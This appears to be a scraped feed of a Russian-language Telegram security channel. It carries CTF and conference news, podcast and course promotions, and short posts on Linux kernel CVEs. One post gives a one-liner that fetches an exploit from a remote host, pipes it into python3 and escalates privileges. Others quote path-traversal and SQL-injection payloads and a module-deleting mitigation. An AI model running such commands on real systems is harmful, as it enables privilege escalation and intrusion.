Сегодня был важный день для команды Ever Secure. Мы провели CTF на конференции DUMP в Екб. * Это те самые лабы, которые будут в нашем курсе, который уже скоро стартует 😏
Вдвойне жесткий день, т.к. спали около 2 часов, до 5 утра сидели с @Bykva и фиксили баги, пилили харденинг и мониторинг 🫠. Спасибо @weahiro за топовый багхантинг. В итоге 23/24 тасок были решены. Только 1 была с багой (захарденили сами себя 😏)
Немного фото с награждения победителей 😉 поздравляю 🎉
Вдвойне жесткий день, т.к. спали около 2 часов, до 5 утра сидели с @Bykva и фиксили баги, пилили харденинг и мониторинг 🫠. Спасибо @weahiro за топовый багхантинг. В итоге 23/24 тасок были решены. Только 1 была с багой (захарденили сами себя 😏)
Немного фото с награждения победителей 😉 поздравляю 🎉
🔥18 6🌚3❤1😁1
Forwarded from Админим с Буквой (Aleksandr Kondratev)
Современная CTF-реальность (основное мероприятие закончилось в 18)
😢8😁7 1
Ever Secure
Друзья, а я напоминаю, что ваш покорный слуга отправляется на CISO FORUM 2026 🔥 Ожидаем много новых гостей на CISO Podcast? 😉 Это не просто форум — это ваша возможность выйти на прямой диалог с лидерами кибербезопасности России. 28 апреля 2026 года в Центре…
Завтра веду секцию "Эволюция атак" на CISO FORUM
Можно будет меня там поймать 😉
Кого бы вы хотели видеть на CISO Podcast? Пишите в комментарии кого попробовать поймать👇
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Можно будет меня там поймать 😉
Кого бы вы хотели видеть на CISO Podcast? Пишите в комментарии кого попробовать поймать
Please open Telegram to view this post
VIEW IN TELEGRAM
👏6 2 1
астрологи объявили неделю обновлений CVE-2026-31431
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
curl https://copy.fail/exp | python3 && su
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7😨5💯2🤣2
в контейнере тоже можно поднять права, если есть петухон (КОНКРЕТНО ДЛЯ ЭТОГО ЭКСПЛОИТА, НАПИСАННОГО НА Python), а дальше уже вы все и так знаете...
но если нет, прикладываю видос с побегами https://youtu.be/biC3TO7OELY
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
но если нет, прикладываю видос с побегами https://youtu.be/biC3TO7OELY
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
патч:
или
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
rm -rf /lib/modules/*/kernel/crypto/algif_aead.*
или
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Кто-нибудь, скажите уже ребятам из Ozon, что при нажатии в письме отписаться от рассылки, нужно ансанскрайбить, а не вести в личный кабинет, которого у меня давно нет, но к нему привязана почта, а меня перекидывает в новый кабинет где почты никакой и нет. Номера старого у меня тоже нет.
Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(
Кажется UX дизайнеру пока напокойотдых)
Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(
Кажется UX дизайнеру пока на
👾9👍7👏3❤2
Forwarded from IT STAND
Live: Kubernetes v1.36: Haru
Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)
❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube
Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00
Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube
При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru
🔥IT STAND |FIDELINA | YouTube
Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)
❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube
Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00
Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube
При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru
🔥IT STAND |
Cloudflare пометила сайт <месенджера с парковки> вредоносным
https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary
Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary
В пресс-службе Max заявили, что мессенджер "регулярно проходит аудиты безопасности, работает с исследователями через программу Bug Bounty и имеет собственный центр безопасности для защиты пользователей от реальных угроз".
Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
😁13❤4👏3🔥1
Ever Secure
Хочу немного рассказать о преподавательском составе курса! Для такого легендарного курса, я позвал не менее легендарных преподавателей. Вот первый из них: Александр Кондратьев (Автор канала Админим с Буквой @bykvaadm, Head of DevOps BI.ZONE). Саша DevOps…
Продолжая про наш будущий курс 👀
DevSecOps — это не «человек со сканером»
Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.
Такому же подходу я придерживаюсь и в обучении!
Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
хотя и их пройдем в самом начале 😉
Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность
И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪
Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.
Старт: 06.06.26
Стоимость: 99к для первого потока
DevSecOps — это не «человек со сканером»
Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.
Такому же подходу я придерживаюсь и в обучении!
Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
../../../etc/passwd и 1' OR 1=1 --.
хотя и их пройдем в самом начале 😉
Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность
И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪
Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.
Старт: 06.06.26
Стоимость: 99к для первого потока
1🔥23🥴7🥱5🙈5👍4
Ever Secure
астрологи объявили неделю обновлений CVE-2026-31431 curl https://copy.fail/exp | python3 && su 👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431)
https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18
Ever Secure
Ждете новый выпуск CISO Podcast?💪
Media is too big
VIEW IN TELEGRAM
Новый выпуск CISO Podcast 🚀🚀🚀
Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими рисками вы столкнётесь и какие криминальные истории остаются за кадром индустрии.
Премьера 10 мая!
📹 Youtube
Предыдущий выпуск: https://t.me/ever_secure/1074
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими рисками вы столкнётесь и какие криминальные истории остаются за кадром индустрии.
Премьера 10 мая!
Предыдущий выпуск: https://t.me/ever_secure/1074
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤7🥰3🤣1
20 мая буду рассказывать, как мы строили процессы безопасности в нашем прекрасном облаке 🌨
Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠:
❔Какие есть подводные камни при переходе с ручных сканов на Admission
❔Как покрыть тепловыми картами кластеры и отслеживать нарушения
❔Как находить аномалии в поведении пользователей
❔И наконец, как это всё подружить с SOC
Вебинар будет полезен CISO, CTO, CIO, ИБ-специалистам и DevOps-инженерам, работающим в облачных средах. Регистрируйтесь, подключайтесь к прямому эфиру ирасскажите в чате как вы сделали лучше задавайте вопросы 😉
📆 20 мая в 12:00
Зарегистрироваться
Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠:
❔Какие есть подводные камни при переходе с ручных сканов на Admission
❔Как покрыть тепловыми картами кластеры и отслеживать нарушения
❔Как находить аномалии в поведении пользователей
❔И наконец, как это всё подружить с SOC
Вебинар будет полезен CISO, CTO, CIO, ИБ-специалистам и DevOps-инженерам, работающим в облачных средах. Регистрируйтесь, подключайтесь к прямому эфиру и
📆 20 мая в 12:00
Зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍7❤🔥3🤗1
Ever Secure
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431) https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes 👀 @ever_secure | 💪 Мерч | 💳 Поддержать
зря мы издевались над астрологами, старая неделя обновлений еще не успела закончится, как подъехала новая неделя обновлений)
Linux LPE
https://github.com/V4bel/dirtyfrag
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Linux LPE
https://github.com/V4bel/dirtyfrag
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤9
Forwarded from Админим с Буквой (Aleksandr Kondratev)
Gist
CVE-2026-43284_CVE-2026-43500_mitigate
CVE-2026-43284_CVE-2026-43500_mitigate. GitHub Gist: instantly share code, notes, and snippets.
❤2🔥1
Мои друзья в этой году в четвертый раз проводят конференцию БеКон 2026: единственную в России конференцию по безопасности контейнеров и Kubernetes
Топовые специалисты рассказывают о безопасности Kubernetes без маркетинговой шелухи: только практики, кейсы и инструменты.
В этом году целых два трека:
🧪 «Ингредиенты» — технологии: hardening кластеров, runtime-защита, policy-as-code, сканирование образов
👥 «Рецепты» — люди и процессы: как выстроить культуру безопасности, коммуникацию Dev/Sec/Ops, внедрить Zero Trust в микросервисы
🗓 2 июня 2026 | 📍 Москва, Лофт ГОЭЛРО
👉 Регистрация и программа
Топовые специалисты рассказывают о безопасности Kubernetes без маркетинговой шелухи: только практики, кейсы и инструменты.
В этом году целых два трека:
🧪 «Ингредиенты» — технологии: hardening кластеров, runtime-защита, policy-as-code, сканирование образов
👥 «Рецепты» — люди и процессы: как выстроить культуру безопасности, коммуникацию Dev/Sec/Ops, внедрить Zero Trust в микросервисы
🗓 2 июня 2026 | 📍 Москва, Лофт ГОЭЛРО
👉 Регистрация и программа
1🔥5 3 2
Ever Secure
Новый выпуск CISO Podcast 🚀🚀🚀 Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими…
Media is too big
VIEW IN TELEGRAM
Друзья, состоялась премьера нового выпуска CISO Podcast!
Приятного просмотра:
📹 Youtube
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Приятного просмотра:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23 3 2